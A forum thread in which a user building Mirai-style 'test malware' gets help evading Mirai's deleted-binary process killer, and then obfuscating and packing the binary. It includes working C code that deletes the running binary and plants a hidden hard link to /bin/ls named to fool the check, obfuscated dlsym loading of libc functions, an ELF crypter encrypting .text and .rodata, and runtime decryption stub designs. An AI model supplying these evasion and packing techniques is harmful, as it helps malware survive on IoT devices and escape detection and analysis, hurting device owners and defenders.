Malware Killed for " (deleted)" binary

my test malware got killed from another because delete the binary, there is a way to bypass this?
or am I forced to keep the binary on the system?

this is the part of the code that kills my test malware, this source code is taken from Mirai malware on github.

(both were launched in the virtual machine)

complete code: https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/killer.c

 // Store /proc/$pid/exe into exe_path
            snprintf(exe_path, sizeof(exe_path), "/proc/%s/exe", file->d_name)


            // Resolve exe_path (/proc/$pid/exe) -> realpath
            if ((rp_len = readlink(exe_path, realpath, sizeof (realpath) - 1)) != -1)
            {
                realpath[rp_len] = 0; // Nullterminate realpath, since readlink doesn't guarantee a null terminated string

                // Skip this file if its realpath == killer_realpath
                if (pid == getpid() || pid == getppid() || util_strcmp(realpath, killer_realpath))
                    continue;

               // if the binary was deleted
                if ((fd = open(realpath, O_RDONLY)) == -1)
                {
#ifdef DEBUG
                    printf("[killer] Process '%s' has deleted binary!\n", realpath);
#endif
                    kill(pid, 9);
                }
                close(fd);
            }

What are you asking? If you’re running a binary on a system the file should be locked because it’s mapped to memory and actively being used. The code you just showed just kills a process that’s running in memory immediately.

If you do more research or just read more of the source code, you will see that there’s a target range that gets killed. In the linux source code there’s a defined minimum PID for reserved system process and a max PID range for everything else. I’d suggest you do more reading to understand that.

image

1 Like

the code checks if the binary file associated with that process exists, if it doesn’t exist, it kills the process because it probably considers it a rival malware that deleted the binary. I just wanted to know if there is a way to delete my malware binary (unlink) from the system without triggering that code.
(from what I understand, I don’t think it’s possible since even if I start my malware directly in memory, it will still scan /proc/pid/exe, try to open it but won’t be able to and therefore it would kill it anyway).
the alternative would be to hide the process in /proc but this would necessarily require root.

1 Like

A very simple but not so elegant way to solve the issue could be this:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main (int argc, char *argv[]) {
  char name[1024];
  char realpath[1024];
  int  rp_len;
  int  fd;

  printf ("This is process (%d)\n", getpid());
  unlink (argv[0]);
  sprintf (name, "%s (deleted)", argv[0]);
  if ((link ("/bin/ls", name)) < 0) perror ("link:");

  // This is the code on the Original Post to check if it works
  sprintf (name, "/proc/%d/exe", getpid ());
  memset (realpath, 0,1024);
  if ((rp_len = readlink (name, realpath, 1023)) < 0) exit (1);
  printf ("'%s' -> '%s'\n", name , realpath);
  if ((fd = open(realpath, O_RDONLY)) == -1)
    {
      printf ("Killing process\n");
      close(fd);
    }
  getchar ();
  
}

In a nutshell, readlink will return the name of the file plus one space plus the string deleted (when the original binary is deleted). So we just create a file with that name. You basically wrote this solution in the title of your post :sweat_smile:.

I chose to create a link so I can create the file in just one syscall. Also, this way, we use a binary already existing in the system that is less suspicious and will pass any file scanning.

Note that your malware is effectively deleted and the file we create is a hard link to ls. A file named filename (deleted) is suspicious so we can just add a . at the beginning to hide the file to a simple ls.

As I said it is not the most elegant way, but it is a way to get your code deleted from disk and pass the Mirai test. As Mirai was intended to run on IoT devices it is unlikely that somebody will be listing some random folder on an IP cam… but who knows.

Actually I have got an idea writing this… but I first have to try it and if it works it would be a nice post so I’ll save it to myself for the time being :wink:

Hope this helps

4 Likes

oh… thank you so much, it was so simple but I couldn’t get there hahaha, it helped me a lot :innocent:.
I would like to know your opinion on another thing, I noticed that in the original mirai code all the standard libraries are used except <string.h> where the author creates the functions he needs in util.c.
By rewriting my malware from scratch I had an idea, why not directly use only the functions we need by taking them from libc.so.6.
I’ll post you a piece of code and tell me what you think (I hope it’s not useless and ugly)

syscall.h

struct fn_table {
    void *libc_handle;

    int (*open)(const char *, int, ...);
    int (*close)(int);

    int (*strcmp)(const char *, const char *);
    int (*snprintf)(char *, size_t, const char *, ...);
    char *(*strstr)(const char *, const char *);

    void (*memset)(void *, int, size_t);
    void *(*malloc)(size_t size);
    void *(*calloc)(size_t nmemb, size_t size);
    void *(*realloc)(void* ptr, size_t size);
    void (*free)(void* ptr);
    void (*exit)(int status);

    int (*unlink)(const char *);
    int (*fork)(void);
    unsigned int (*sleep)(unsigned int);
    int (*kill)(pid_t, int);
    ssize_t (*readlink)(const char *, char *, size_t);
    pid_t (*getpid)(void);
    pid_t (*getppid)(void);
    ssize_t (*read)(int, void *, size_t);
    size_t (*strlen)(const char *);
    char *(*strncpy)(char *, const char *, size_t);
    int (*fcntl)(int, int, ...);
    char *(*strchr)(const char *, int);
    int (*atoi)(const char *);
};

extern struct fn_table fn; 

syscall.c

void load_syscall(void)
{
    char *libc = "libc.so.6";
    fn.libc_handle = dlopen(libc, RTLD_LAZY);

    char *malloc = "malloc";
    fn.malloc = dlsym(fn.libc_handle, malloc);

    char *free = obfd("\x56\x42\x55\x55\x30", 5);
    fn.free = dlsym(fn.libc_handle, free);
    fn.free(free);

    char *open = obfd("\x5F\x40\x55\x5E\x30", 5);
    fn.open = dlsym(fn.libc_handle, open);
    fn.free(open);

    char *close = obfd("\x53\x5C\x5F\x43\x55\x30", 6);
    fn.close = dlsym(fn.libc_handle, close);
    fn.free(close);
    
    char *strcmp = obfd("\x43\x44\x42\x53\x5D\x40\x30", 7);
    fn.strcmp = dlsym(fn.libc_handle, strcmp);
    fn.free(strcmp);

    char *snprintf = obfd("\x43\x5E\x40\x42\x59\x5E\x44\x56\x30", 9);
    fn.snprintf = dlsym(fn.libc_handle, snprintf);
    fn.free(snprintf);

    char *strstr = obfd("\x43\x44\x42\x43\x44\x42\x30", 7);
    fn.strstr = dlsym(fn.libc_handle, strstr);
    fn.free(strstr);
    
    char *memset = obfd("\x5D\x55\x5D\x43\x55\x44\x30", 7);
    fn.memset = dlsym(fn.libc_handle, memset);
    fn.free(memset);

    char *calloc = obfd("\x53\x51\x5C\x5C\x5F\x53\x30", 7);
    fn.calloc = dlsym(fn.libc_handle, calloc);
    fn.free(calloc);

    char *realloc = obfd("\x42\x55\x51\x5C\x5C\x5F\x53\x30", 8);
    fn.realloc = dlsym(fn.libc_handle, realloc);
    fn.free(realloc);

    char *exit = obfd("\x55\x48\x59\x44\x30", 5);
    fn.exit = dlsym(fn.libc_handle, exit);
    fn.free(exit);
    
    char *unlink = obfd("\x45\x5E\x5C\x59\x5E\x5B\x30", 7);
    fn.unlink = dlsym(fn.libc_handle, unlink);
    fn.free(unlink);

    char *fork = obfd("\x56\x5F\x42\x5B\x30", 5);
	fn.fork = dlsym(fn.libc_handle, fork);
    fn.free(fork);

    char *sleep = obfd("\x43\x5C\x55\x55\x40\x30", 6);
	fn.sleep = dlsym(fn.libc_handle, sleep);
    fn.free(sleep);

    char *kill = obfd("\x5B\x59\x5C\x5C\x30", 5);
	fn.kill = dlsym(fn.libc_handle, kill);
    fn.free(kill);

    char *readlink = obfd("\x42\x55\x51\x54\x5C\x59\x5E\x5B\x30", 9);
	fn.readlink = dlsym(fn.libc_handle, readlink);
    fn.free(readlink);

    char *getpid = obfd("\x57\x55\x44\x40\x59\x54\x30", 7);
	fn.getpid = dlsym(fn.libc_handle, getpid);
    fn.free(getpid);

    char *getppid = obfd("\x57\x55\x44\x40\x40\x59\x54\x30", 8);
	fn.getppid = dlsym(fn.libc_handle, getppid);
    fn.free(getppid);

    char *read = obfd("\x42\x55\x51\x54\x30", 5);
	fn.read = dlsym(fn.libc_handle, read);
    fn.free(read);

    char *strlen = obfd("\x43\x44\x42\x5C\x55\x5E\x30", 7);
    fn.strlen = dlsym(fn.libc_handle, strlen);
    fn.free(strlen);

    char *strncpy = obfd("\x43\x44\x42\x5E\x53\x40\x49\x30", 8);
    fn.strncpy = dlsym(fn.libc_handle, strncpy);
    fn.free(strncpy);

    char *fcntl = obfd("\x56\x53\x5E\x44\x5C\x30", 6);
    fn.fcntl = dlsym(fn.libc_handle, fcntl);
    fn.free(fcntl);

    char *strchr = obfd("\x43\x44\x42\x53\x58\x42\x30", 7);
    *(void **)(&fn.strchr) = dlsym(fn.libc_handle, strchr);
    fn.free(strchr);

    char *atoi = obfd("\x51\x44\x5F\x59\x30", 5);
    fn.atoi = (int (*)(const char *))dlsym(fn.libc_handle, atoi);
    fn.free(atoi);
}

Hi @darad

Not sure why Mirai only implements strings, haven’t really go into all the code in detail.

I believe whenever you do the dlopen the whole library is loaded in memory. So, even if you do not map all the symbols, the code of all of them will be in memory, even when you just resolve a few symbols… Just try with a small library and check /proc/PID/maps to see the memory assigned after and before loading the library. The main advantage of using dlsym is to hide to the analyst the functions you use from a library, or to swap them dynamically… may be other use cases for those but I cannot thing about any right now (it is common on Windows tho).

Furthermore, getting your program to run without libc is tricky because libc does not just provides the regular functions you use in your programs, it also contains all the initialisation code that is needed in order to run main… that is the infamous crt0.o, crtS.o, et al … This code sets up the stack, runs constructors and makes sure destructors will be executed before terminating the program (well not all crt files implements the constructor/destructor thingy). BTW, crt stands for C Run-Time.

This post may give you a bit of insights on what this involves (however it doesn’t dive on crt implementation, but there are very good tutorials out there if you are interested):

1 Like

thank you for the answer, I will check the post immediately, for now the functions are working correctly, both in the main and in the other .c files, I will check /proc/pid/maps regarding the memory allocated before and after loading the library.
my intent was to hide the functions and get a smaller binary file by loading only the necessary functions

1 Like

hi @0x00pf

this is the /proc/pid/maps of the malware

Unless you have done some something special, your program is already linked to libc. In other words, it doesn’t mater if you dlopen the library, because it is already there. Try to comment out the code that dlopen the library and you will still see the same mapping.

For example, this code works:

#include <dlfcn.h>

int main () {
  void *h = dlopen (0x0, RTLD_LAZY);
  
  void (*my_puts)(char *) = dlsym (h, "puts");
  my_puts ("Hello World");
}

If you compile and run it…

$ gcc -o test1 test1.c -ldl
$ ./test1
Hello World

because libc is already mapped (you do not need to open it, it is already there.
Summing up:

  • You do not need to dlopen libC unless you have compiled your program specially to not include it. Even then, it is likely that some things won’t work unless you make sure that all the initialisation performed by the library is done by your program… and then you end up doing the same thing that libC does
  • Doesn’t matter if you dlopen libc or just linked it dynamically. Your binary will be the same size (that’s the main goal of dynamic libraries) and the memory footprint will also be the same as, in both cases, libC gets loaded in memory anyhow
  • AFAIK dlsym resolves symbols, doesn’t extract pieces of code of a library. Just take some non-trivial library out there, and start importing function and check if the mapping of that library changes (grows). Honestly I do not know if that is the case, but I believe the whole thing is loaded at once (when memory pages get actually filled in is something else).

To hide the functions names you can just strip your binary and remove any symbols. People can still reverse engineer your program… people can always reverse engineer your program. dlsyming obfuscated functions is actually worst, because you can reverse the obfuscated function name and get the names of the function… However, I’m curious about what is the rational on hiding standard libC functions…

To make your binary smaller you better go for a libC version targetting embedded systems like musl or uLibC. You can customise what you want in the library (at least for uLibC) and also, as far as I remember you can compile it as a static library. With a static library the code you don’t use is not included at linking stage… at the level of the object files packed together in the library (not at function levels).

1 Like

Thank you, this is all clearer too, I wasn’t aware of what you explained to me now.
I will modify the code using musl or uLibC, because from what I understand it is not very useful to use dlsym and dlopen (or at least in this case).
I’ll take a look at the strip options too.
I was also thinking of making the code metamorphic/polymorphic but I think it’s a bit complicated, since if I have to compile the malware to make it work on various architectures I have to use assemblies of each specific architecture such as ARM, MIPS etc…

1 Like

It all depends on what you want to do. I do not think it is usuful to use dlXXX with libC, but may be cases where that may be the way forward. There is no magic solution for all cases. You need to think about what you want to achieve and find the better solution.

For example, using uLibC statically will make your program bigger because all the code you use from libc.so is now included in your binary. On the other hand, your program will work on any system, despite of the libC version installed on it. As I said, it depends on what you want. If you are targetting routers… many of those runs busybox using uLibC… no libc.so in the filesystem …so you will have to transfer the library together with your program to make it work. So, you are not saving any space in the size of your program… actually the other way around.

The easy way to make your code polymorphic is using a crypter. Over all, you want your crypter stub to be small as that is the part that doesn’t change and that is why many times it is implemented in asm (among other reasons), but you can implement the stub in C if you want. Take a look to this series on crypters from some time ago. Still valid tho, as far as I reckon . The stub is coded in asm on those posts, but they describe what you have to do, so you just can implement it using C:

2 Likes

perfect, thank you very much, these posts are very interesting and will definitely help me.

hi, I’m following the post on the elf crypter, everything works, except when it uses the encryption function, in my case I tried xor and aes, with both it doesn’t work (when i try to run the binary it print seg fault), while if I use your rc4 algorithm it works, I don’t understand why, this is my code.
I’m still stuck at the first document ( Programming for Wanabes XIII. Crypters part I) because I’m trying to modify your crypter and add something, also to understand how the elf headers work.
I’m pretty sure there’s something wrong with the encryption stage.

static uint32_t table_key = 0xcafebabe;

int main (int argc, char *argv[])
{
	if (argc != 2) 
	{
    		fprintf (stderr, "Invalid number of parameters\n");
    		fprintf (stderr, "Usage: crypter <binary>\n");
    		exit(-1);
  	}

	int fd = -1;
	if((fd = open(argv[1], O_RDWR)) == -1)
		exit(-1);

	struct stat _st;
	if((fstat (fd, &_st)) == -1)
		exit(-1);

	unsigned char *p;
	if ((p = mmap (0, _st.st_size, PROT_READ | PROT_WRITE,
		 MAP_SHARED, fd, 0)) == MAP_FAILED)
	{
		fprintf (stderr, "Error mapping the binary\n");
		exit(-1);
	}

	Elf64_Ehdr *elf_header = (Elf64_Ehdr*)p;
	printf("Magic Bytes: %02x %c %c %c\n", elf_header->e_ident[0], elf_header->e_ident[1], elf_header->e_ident[2], elf_header->e_ident[3]);
	if (memcmp(elf_header->e_ident, ELFMAG, SELFMAG) != 0)
	{
    	fprintf(stderr, "Invalid file format\n");
    	fprintf(stderr, "Elf Required!\n");
    	munmap(p, _st.st_size);
    	close(fd);
    	exit(-1);
	}

	if(elf_header->e_type != ET_DYN)
	{
		fprintf (stderr, "File is not an executable\n");
		munmap(p, _st.st_size);
    	close(fd);
    	exit(-1);
	}


	printf ("Section Table located at : %ld\n", elf_header->e_shoff);
	printf ("Section Table entry size : %hu\n", elf_header->e_shentsize);
	printf ("Section Table entries    : %hu\n", elf_header->e_shnum);

	Elf64_Shdr *sh = (Elf64_Shdr*)(p + elf_header->e_shoff);
	unsigned char *s_name   = p + sh[elf_header->e_shstrndx].sh_offset;
	unsigned char *name = NULL;
	//char *key ="0x00Sec!\0";
	for (size_t i = 0; i < elf_header->e_shnum; i++)
	{
		name = s_name + sh[i].sh_name;
 		if (!strcmp((const char *)name, ".text") || !strcmp ((const char *)name, ".rodata"))
 		{
 			printf ("Section %02zu [%s]: Type: %d Flags: %lx Off: %lx Size: %lx => ",i, name,sh[i].sh_type, sh[i].sh_flags,sh[i].sh_offset, sh[i].sh_size);
	  		if (sh[i].sh_offset + sh[i].sh_size > _st.st_size)
	  		{
            	fprintf(stderr, "Error: Attempting to XOR beyond the end of the file.\n");
            	munmap(p, _st.st_size);
            	close(fd);
            	exit(-1);
        	}

	  		//rc4(p + sh[i].sh_offset, sh[i].sh_size, (unsigned char*)key, strlen (key));
	  		xor(p + sh[i].sh_offset, sh[i].sh_size);
      		puts(" - Crypted!");
  		}

 	}

	munmap(p, _st.st_size);
    close(fd);
	return 0;
}

static void xor(unsigned char *data, size_t data_len)
{
    uint8_t k1 = table_key & 0xff, k2 = (table_key >> 8) & 0xff, k3 = (table_key >> 16) & 0xff, k4 = (table_key >> 24) & 0xff;
    uint32_t cnt = 0;
    for (size_t i = 0; i < data_len; i++)
    {
        data[i] ^= k1;
        data[i] ^= k2;
        data[i] ^= k3;
        data[i] ^= k4;
        ++cnt;
    }
    printf(" [%d bytes encoded]", cnt);
}

First instalment just tell you how to implement RC4 and how to crypt the .text and .rodata sections. The output you get from your program cannot be executed yet. It is missing the stub that is added in the next installments. So it is normal that the program crashes. It usually does it with an illegal instruction exception tho. Using a xor encoder you can just run the crypter again to verify the code is restored. If it works with rc4 that means something is wrong.

Also note that the way you implement xor is strange. I’d expect something like this, for example:

    for (size_t i = 0; i < data_len; i+=4)
    {
        data[i]     ^= k1;
        data[i + 1] ^= k2;
        data[i + 2] ^= k3;
        data[i + 3] ^= k4;
        ++cnt;
    }

ok yes, I think it’s the length of the key, trying rc4 with the key “0x00Sec!\0” works, in the sense that it prints “Illegal instructions”, while if I change the key to “0x00SecSoc!\0” it prints Segmentation Fault.
ok, while if I run rc4 again the binary file works again, well, I might try implementing rc6.

That’s a great question. I will just second 0x00pf. They seem to have laid out the best way to solve this.

hi @0x00pf if I wrote the stub in c, is the procedure the same to obtain the shellcode?
stub.c

#include <stdio.h>
#include <stdlib.h>

int main()
{
    printf("hello world\n");

    return 0;
}

That won’t work. It will dump the whole .text section that for a executable contains much more than just main.

If you want to write the whole code in C, just call the stub from main. There are more elegant ways of doing that, but just calling it from main is the simplest and works. Your main problem is how to differentiate between your stub and the code you want to crypt/decrypt.

There are different solutions for that, the easiest is to put your code together and add a dummy function before main (and pray to the Void* Godess to not re-order your code). Then you need to crypt between the first function and the dummy function… however, this is a crappy solution as the compiler or the linker may reorganise your code and things will stop working… But you may give it a try to this as it is conceptually simpler. Then you can work out your solution from there. This will also help you to get fluent with readelf and objdump tools.


int this_will_be_crypted () {....}
int this_will_also_be_crypted () {..}
(....)
int i_stop_crypting_here () {...}

int stub_written_in_C () {
  void *start = this_will_be_crypted;
  void *end = i_stop_crypting_here;
  size_t size = end - start;

 // Change memory permissions
// Crypt/Decrypt size bytes starting at start

}

in main () {
  stub_written_in_C ();
}

You should check that actually all the code you want to crypt is consecutive in memory and the I_stop_crypting_here function is the last one. For a simple program should work (for a single function should work :slight_smile: ). Do not try to go for a full-fledge application. Use objdump for checking that. You can also try to add your own symbols (labels) at the end of each function so you now where they start and where they end. Then you need to crypt/decrypt each one separately.

When do you understand how this works… just look for a way to let the compiler or linker group all your code together. Just do smaller steps, otherwise some concepts are just too difficult to grasp at first.

Hope this helps

1 Like

Thank you for the reply, one idea(it’s not completely my own work, I looked at many examples around, I found this interesting: Introduction to Malware Obfuscation Using ELF Sections | Epitech-Lyon) is to create a new section that contains:

#define SECTION(x) __attribute__((section(x)))

SECTION(".stub") void stub(char *argv0)
{
     //code to map the elf
    .....
    //code to find sections
    ....
   decrypt(p + sh...);
}

int main(int argc, char **argv)
{
     stub(argv0);
}

and call this function in the only part of the main that has not been encrypted, I hope I understood correctly.

2 Likes

You found it quickly :slight_smile: … Maybe I gave to much hints :sweat_smile:

Now take a look to __atribute__ ((constructor)) to get a cleaner solution and you are done with the C part :wink: …

1 Like